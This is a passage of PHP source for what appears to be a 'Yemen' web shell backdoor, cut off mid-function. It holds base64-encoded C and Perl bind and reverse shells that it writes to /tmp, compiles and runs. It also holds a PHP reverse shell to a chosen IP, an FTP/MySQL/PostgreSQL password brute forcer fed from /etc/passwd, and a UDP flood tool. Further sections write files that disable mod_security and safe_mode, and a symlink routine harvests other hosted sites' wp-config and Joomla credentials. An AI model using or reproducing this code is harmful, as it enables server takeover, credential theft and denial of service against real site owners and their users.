$bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
?>
<h1><font color="green">Bind Port</font></h1><div class=content>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);
return false;
">
<span>Bind port to /bin/sh</span><br/><font color="green">
Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit s s value=">>">
</font></form>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);
return false;
">
<span>Back-connect to</span><br/> <font color="green">
Server: <input type='text' name='server' value='
<?php
echo $_SERVER['REMOTE_ADDR'];
?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit s s value=">>">
</font></form><br>
<?php
if (isset($_POST['p1'])) {
function cf($f, $t)
{
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, base64_decode($t)) or @fputs($w, base64_decode($t)) or @file_put_contents($f, base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpc') {
cf("/tmp/bp.c", $bind_port_c);
$out = ex("gcc -o /tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
$out .= ex("/tmp/bp " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$out}\r\n" . ex("ps aux | grep bp") . "</pre>";
}
if ($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl", $bind_port_p);
$out = ex(which("perl") . " /tmp/bp.pl " . $_POST['p2'] . " &");
echo "<pre class=ml1>{$out}\r\n" . ex("ps aux | grep bp.pl") . "</pre>";
}
if ($_POST['p1'] == 'bcc') {
cf("/tmp/bc.c", $back_connect_c);
$out = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$out .= ex("/tmp/bc " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$out}\r\n" . ex("ps aux | grep bc") . "</pre>";
}
if ($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl", $back_connect_p);
$out = ex(which("perl") . " /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$out}\r\n" . ex("ps aux | grep bc.pl") . "</pre>";
}
}
echo "</div>";
yemenfooter();
}
function yemenhash()
{
if (!function_exists('hex2bin')) {
function hex2bin($p)
{
return decbin(hexdec($p));
}
}
if (!function_exists('binhex')) {
function binhex($p)
{
return dechex(bindec($p));
}
}
if (!function_exists('hex2ascii')) {
function hex2ascii($p)
{
$r = '';
for ($i = 0; $i < strLen($p); $i += 2) {
$r .= chr(hexdec($p[$i] . $p[$i + 1]));
}
return $r;
}
}
if (!function_exists('ascii2hex')) {
function ascii2hex($p)
{
$r = '';
for ($i = 0; $i < strlen($p); ++$i) {
$r .= sprintf('%02X', ord($p[$i]));
}
return strtoupper($r);
}
}
if (!function_exists('full_urlencode')) {
function full_urlencode($p)
{
$r = '';
for ($i = 0; $i < strlen($p); ++$i) {
$r .= '%' . dechex(ord($p[$i]));
}
return strtoupper($r);
}
}
$stringTools = array('base64_encode()' => 'base64_encode', 'base64_decode()' => 'base64_decode', 'md5()' => 'md5', 'sha1()' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'url_encode()' => 'urlencode', 'url decode()' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'htmlspecialchars()' => 'htmlspecialchars');
yemenhead();
echo "<div class=header>";
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
}
echo "<form onSubmit='g(null,null,this.selectTool.value,this.input.value);\r\n\r\n\r\n return false;\r\n\r\n\r\n'><select name='selectTool'>";
foreach ($stringTools as $k => $v) {
echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
}
echo "</select><input type='submit' value='>>'/><br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;
' : '') . "margin-top:5px' id='strOutput'>";
if (!empty($_POST['p1'])) {
if (in_array($_POST['p1'], $stringTools)) {
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
}
echo "</div>";
yemenFooter();
}
function yemenbruteftp()
{
yemenhead();
if (isset($_POST['proto'])) {
echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
if ($_POST['proto'] == 'ftp') {
function bruteForce($ip, $port, $login, $pass)
{
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) {
return false;
}
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST['proto'] == 'mysql') {
function bruteForce($ip, $port, $login, $pass)
{
$res = @mysql_connect($ip . ':' . $port ? $port : 3306, $login, $pass);
@mysql_close($res);
return $res;
}
} elseif ($_POST['proto'] == 'pgsql') {
function bruteForce($ip, $port, $login, $pass)
{
$str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=''";
$res = @pg_connect($server[0] . ':' . $server[1] ? $server[1] : 5432, $login, $pass);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if ($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if (is_array($temp)) {
foreach ($temp as $line) {
$line = explode(":", $line);
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
}
if (@$_POST['reverse']) {
$tmp = "";
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
}
}
}
}
} elseif ($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if (is_array($temp)) {
foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (bruteForce($server[0], @$server[1], $_POST['login'], $line)) {
$success++;
echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
}
}
}
}
echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
}
echo '<h1><font color=yellow >FTP bruteforce</font></h1><div class=content><table><form method=post><tr><td><span>Type</span></td><td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td><input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '><td><label><font color=white> <input type=radio name=type value="1" checked> /etc/passwd</font></label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><font color=white><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><font color=white><input type=radio name=type value="2"> Dictionary</font></label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="Yemen"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit s s value=">>"></td></tr></form></table>';
echo "</div><br>";
yemenFooter();
}
function yemendos()
{
yemenhead();
echo "<div class=header>";
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
}
echo "<center><span>| UDP DOSSIER |</span><br><br><form onSubmit=\"g(null,null,this.udphost.value,this.udptime.value,this.udpport.value);\r\n\r\n\r\n return false;\r\n\r\n\r\n\" method=POST><span>Host :</span><input name=\"udphost\" type=\"text\" size=\"25\" /><span>Time :</span><input name=\"udptime\" type=\"text\" size=\"15\" /><span>Port :</span><input name=\"udpport\" type=\"text\" size=\"10\" /><input type=\"submit\" value=\">>\" /></form></center>";
echo "<pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;
' : '') . "margin-top:5px' >";
if (!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3'])) {
$packets = 0;
ignore_user_abort(true);
$exec_time = $_POST['p2'];
$time = time();
$max_time = $exec_time + $time;
$host = $_POST['p1'];
$portudp = $_POST['p3'];
for ($i = 0; $i < 65000; $i++) {
$out .= 'X';
}
while (1) {
$packets++;
if (time() > $max_time) {
break;
}
$fp = fsockopen('udp://' . $host, $portudp, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
}
}
echo "{$packets} (" . round($packets * 65 / 1024, 2) . " MB) packets averaging " . round($packets / $exec_time, 2) . " packets per second";
echo "</pre>";
}
echo "</div>";
yemenfooter();
}
function yemenproc()
{
yemenhead();
echo "<Div class=header>";
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
}
if ($GLOBALS['sys'] == "win") {
$process = array("System Info" => "systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all");
} else {
$process = array("Process status" => "ps aux", "Syslog" => "cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" => "cat /etc/hosts", "Passwd" => "cat /etc/passwd", "Cpuinfo" => "cat /proc/cpuinfo", "Version" => "cat /proc/version", "Sbin" => "ls -al /usr/sbin", "Interrupts" => "cat /proc/interrupts", "lsattr" => "lsattr -va", "Uptime" => "uptime", "Fstab" => "cat /etc/fstab", "HDD Space" => "df -h");
}
if (!empty($_POST['p1'])) {
echo "<form onsubmit=\"Encoder2('encod2');\r\n\r\n\r\ng('proc',null,this.c.value);\r\n\r\n\r\nreturn false;\r\n\r\n\r\n\"><center><font style='color:red;\r\n\r\n\r\nwidth:blod;\r\n\r\n\r\nfont-size:16px;\r\n\r\n\r\nfont-family:auto;\r\n\r\n\r\n'>~= Terminal Mod =~</font></center><input class=\"toolsInp\" type=text style='width:92.5%;\r\n\r\n\r\npadding:2px;\r\n\r\n\r\nmargin:2px;\r\n\r\n\r\ncolor:white;\r\n\r\n\r\n' autocomplete=ON id=encod2 name=c value='' autofocus><input style='width:5%;\r\n\r\n\r\npadding:1px;\r\n\r\n\r\n' type=submit value=\">>\"></form>\r\n<div padding=1px ><textarea class='ml1' style='height:400px;\r\n\r\n\r\nwidth:98%;\r\n\r\n\r\n margin-top:5px;\r\n\r\n\r\nmargin-bottom:10px;\r\n\r\n\r\nborder: 1px solid red;\r\n\r\n\r\n' >";
echo yemenEx($_POST['p1']);
echo "</textarea></div>\r\n<hr>\r\n";
}
echo "<center>";
foreach ($process as $n => $link) {
echo '<a href="#" onclick="g(null,null,\'' . base64_encode($link) . '\')"> | <b>' . $n . '</b> | </a></br></br>';
}
echo "</center>";
echo "</div>";
yemenfooter();
}
function yemensafe()
{
yemenhead();
echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| " . $GLOBALS['cwd'] . " |<br>";
echo "<a href=# onclick=\"g(null,null,'php.ini',null)\">| PHP.INI | </a><a href=# onclick=\"g(null,null,null,'ini')\">| .htaccess(Mod) | </a><a href=# onclick=\"g(null,null,null,null,'sh')\">| .htaccess(perl) | </a></center>";
if (!empty($_POST['p2']) && isset($_POST['p2'])) {
$fil = fopen($GLOBALS['cwd'] . ".htaccess", "w");
fwrite($fil, '<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>');
fclose($fil);
}
if (!empty($_POST['p1']) && isset($_POST['p1'])) {
$fil = fopen($GLOBALS['cwd'] . "php.ini", "w");
fwrite($fil, 'safe_mode=OFF
disable_functions=NONE');
fclose($fil);
}
if (!empty($_POST['p3']) && isset($_POST['p3'])) {
$fil = fopen($GLOBALS['cwd'] . ".htaccess", "w");
fwrite($fil, 'Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .sh
AddHandler cgi-script .pl
AddHandler cgi-script .pl');
fclose($fil);
}
echo "<br></div>";
yemenfooter();
}
function yemenconnect()
{
yemenhead();
$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
echo "<div class=header><center><h3><span>| PERL AND PHP(threads) BACK CONNECT |</span></h3>";
echo "<form onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);\r\n\r\n\r\nreturn false;\r\n\r\n\r\n\"><span>PERL BACK CONNECT</span><br>IP: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form>";
echo "<br><form onSubmit=\"g(null,null,'php',this.server.value,this.port.value);\r\n\r\n\r\nreturn false;\r\n\r\n\r\n\"><span>PHP BACK CONNECT</span><br>IP: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form></center>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl", $back_connect_p);
$out = yemenEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
echo "<pre class=ml1 style='margin-top:5px'>Successfully opened reverse shell to " . $_POST['p2'] . ":" . $_POST['p3'] . "<br>Connecting...</pre>";
@unlink("/tmp/bc.pl");
}
if ($_POST['p1'] == 'php') {
@set_time_limit(0);
$ip = $_POST['p2'];
$port = $_POST['p3'];
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a;
w;
id;
/bin/sh -i';
$daemon = 0;
$debug = 0;
echo "<pre class=ml1 style='margin-top:5px'>";
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
echo "Cant fork!<br>";
exit(1);
}
if ($pid) {
exit(0);
}
if (posix_setsid() == -1) {
echo "Error: Can't setsid()<br>";
exit(1);
}
$daemon = 1;
} else {
echo "WARNING: Failed to daemonise. This is quite common and not fatal<br>";
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
echo "{$errstr} ({$errno})";
exit(1);
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
echo "ERROR: Can't spawn shell<br>";
exit(1);
}
@stream_set_blocking($pipes[0], 0);
@stream_set_blocking($pipes[1], 0);
@stream_set_blocking($pipes[2], 0);
@stream_set_blocking($sock, 0);
echo "Successfully opened reverse shell to {$ip}:{$port}<br>";
while (1) {
if (feof($sock)) {
echo "ERROR: Shell connection terminated<br>";
break;
}
if (feof($pipes[1])) {
echo "ERROR: Shell process terminated<br>";
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = @stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) {
echo "SOCK READ<br>";
}
$input = fread($sock, $chunk_size);
if ($debug) {
echo "SOCK: {$input}<br>";
}
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) {
echo "STDOUT READ<br>";
}
$input = fread($pipes[1], $chunk_size);
if ($debug) {
echo "STDOUT: {$input}<br>";
}
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) {
echo "STDERR READ<br>";
}
$input = fread($pipes[2], $chunk_size);
if ($debug) {
echo "STDERR: {$input}<br>";
}
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo "</pre>";
}
}
echo "</div>";
yemenfooter();
}
function yemenyemen()
{
yemenhead();
echo "<div style='height:100%;\r\n\r\n\r\nwidth:100%;\r\n\r\n\r\nborder: 2px solid #5BEEFF;\r\n\r\n\r\npadding-top:20px;\r\n\r\n\r\n' ><center><b><font color=white size=4 face=Georgia, Arial>Upgrade By 3Turr</br>Old version Developed by Monds & hatrk <br>respect the coders ^_^</font></b></center>";
yemenfooter();
}
function yemensymlink()
{
yemenhead();
$IIIIIIIIIIIl = 'http://' . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$IIIIIIIIIII1 = explode('/', $IIIIIIIIIIIl);
$IIIIIIIIIIIl = str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1) - 1], '', $IIIIIIIIIIIl);
echo "<div class=header><script>p1_=p2_=p3_=\"\";\r\n\r\n\r\n</script><br><center><h3><a href=# onclick=\"g('symlink',null,'website',null)\">| Domains |</br> </a><a href=# onclick=\"g('symlink',null,null,'whole')\">| ls -n /sym| </br></a><a href=# onclick=\"g('symlink',null,null,null,'config')\">| Config PHP symlink | </a></h3></center>";
if (isset($_POST['p1']) && $_POST['p1'] == 'website') {
echo "<center>";
$d0mains = @file("/etc/named.conf");
if (!$d0mains) {
echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
}
echo "<table align=center class='main' border=0 >\r\n<tr bgcolor=Red><td>Count</td><td>domains</td><td>users</td></tr>";
$count = 1;
foreach ($d0mains as $d0main) {
if (@eregi("zone", $d0main)) {
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if (strlen(trim($domains[1][0])) > 2) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
echo "<tr><td>" . $count . "</td><td><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user['name'] . "</td></tr>";
flush();
$count++;
}
}
}
echo "</center></table>";
}
if (isset($_POST['p2']) && $_POST['p2'] == 'whole') {
@set_time_limit(0);
echo "<center>";
@mkdir('sym', 0777);
$IIIIIIIIIIl1 = "Options all \r\n DirectoryIndex Sux.html \r\n AddType text/plain .php \r\n AddHandler server-parsed .php \r\n AddType text/plain .html \r\n AddHandler txt .html \r\n Require None \r\n Satisfy Any";
$IIIIIIIIII1I = @fopen('sym/.htaccess', 'w');
fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
@symlink('/', 'sym/root');
$IIIIIIIIIlIl = basename('_FILE_');
$IIIIIIIIIllI = @file('/etc/named.conf');
if (!$IIIIIIIIIllI) {
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
} else {
echo "<table align='center' width='40%' class='main'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) {
if (@eregi('zone', $IIIIIIIIIll1)) {
preg_match_all('#zone "(.*)"#', $IIIIIIIIIll1, $IIIIIIIIIl11);
flush();
if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) {
$IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/' . $IIIIIIIIIl11[1][0]));
$IIIIIIII1I1l = $IIIIIIIII1I1['name'];
@symlink('/', 'sym/root');
$IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
$IIIIIIII1I11 = '\\.ir';
$IIIIIIII1lII = '\\.il';
if (@eregi("\\.ir", $IIIIIIIIIl11[1][0]) or @eregi("\\.il", $IIIIIIIIIl11[1][0])) {
$IIIIIIII1I1l = "<div style=' color: #FF0000 ;\r\n\r\n\r\n text-shadow: 0px 0px 1px red;\r\n\r\n\r\n '>" . $IIIIIIIIIl11[1][0] . '</div>';
}
echo "\r\n<tr>\r\n<td>\r\n<a target='_blank' href=http://www." . $IIIIIIIIIl11[1][0] . '/>' . $IIIIIIII1I1l . ' </a>
</td>
<td>
' . $IIIIIIIII1I1['name'] . "\r\n</td>\r\n<td>\r\n<a href='sym/root/home/" . $IIIIIIIII1I1['name'] . "/public_html' target='_blank'>symlink </a>\r\n</td>\r\n</tr>";
flush();
}
}
}
}
echo "</center></table>";
}
if (isset($_POST['p3']) && $_POST['p3'] == 'config') {
echo "<center>";
@mkdir('sym', 0777);
$IIIIIIIIIIl1 = "Options all \r\n DirectoryIndex Sux.html \r\n AddType text/plain .php \r\n AddHandler server-parsed .php \r\n AddType text/plain .html \r\n AddHandler txt .html \r\n Require None \r\n Satisfy Any";
$IIIIIIIIII1I = @fopen('sym/.htaccess', 'w');
@fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
@symlink('/', 'sym/root');
$IIIIIIIIIlIl = basename('_FILE_');
$IIIIIIIIIllI = @file('/etc/named.conf');
if (!$IIIIIIIIIllI) {
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
} else {
echo "\r\n<table align='center' width='40%' class='main' ><td> Domains </td><td> Script </td>";
foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) {
if (@eregi('zone', $IIIIIIIIIll1)) {
preg_match_all('#zone "(.*)"#', $IIIIIIIIIll1, $IIIIIIIIIl11);
flush();
if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) {
$IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/' . $IIIIIIIIIl11[1][0]));
$IIIIIIIII1l1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/wp-config.php';
$IIIIIIIII11I = get_headers($IIIIIIIII1l1);
$IIIIIIIII11l = $IIIIIIIII11I[0];
$IIIIIIIII111 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/blog/wp-config.php';
$IIIIIIIIlIII = get_headers($IIIIIIIII111);
$IIIIIIIIlIIl = $IIIIIIIIlIII[0];
$IIIIIIIIlII1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/configuration.php';
$IIIIIIIIlIlI = get_headers($IIIIIIIIlII1);
$IIIIIIIIlIll = $IIIIIIIIlIlI[0];
$IIIIIIIIlIl1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/joomla/configuration.php';
$IIIIIIIIlI1I = get_headers($IIIIIIIIlIl1);
$IIIIIIIIlI1l = $IIIIIIIIlI1I[0];
$IIIIIIIIlI11 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/includes/config.php';
$IIIIIIIIllII = get_headers($IIIIIIIIlI11);
$IIIIIIIIllIl = $IIIIIIIIllII[0];
$IIIIIIIIllI1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/vb/includes/config.php';
$IIIIIIIIlllI = get_headers($IIIIIIIIllI1);
$IIIIIIIIllll = $IIIIIIIIlllI[0];
$IIIIIIIIlll1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/forum/includes/config.php';
$IIIIIIIIll1I = get_headers($IIIIIIIIlll1);
$IIIIIIIIll1l = $IIIIIIIIll1I[0];
$IIIIIIIIll11 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . 'public_html/clients/configuration.php';
$IIIIIIIIl1II = get_headers($IIIIIIIIll11);
$IIIIIIIIl1Il = $IIIIIIIIl1II[0];
$IIIIIIIIl1I1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/support/configuration.php';
$IIIIIIIIl1II = get_headers($IIIIIIIIl1I1);
$IIIIIIIIl1lI = $IIIIIIIIl1II[0];
$IIIIIIIIl1ll = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/client/configuration.php';
$IIIIIIIIl1l1 = get_headers($IIIIIIIIl1ll);
$IIIIIIIIl11I = $IIIIIIIIl1l1[0];
$IIIIIIIIl11l = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/submitticket.php';
$IIIIIIIIl111 = get_headers($IIIIIIIIl11l);
$IIIIIIII1III = $IIIIIIIIl111[0];
$IIIIIIII1IIl = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/client/configuration.php';
$IIIIIIII1II1 = get_headers($IIIIIIII1IIl);
$IIIIIIII1IlI = $IIIIIIII1II1[0];
$IIIIIIII1Ill = strpos($IIIIIIIII11l, '200');
$IIIIIIII1I1I = '
';
if (strpos($IIIIIIIII11l, '200') == true) {
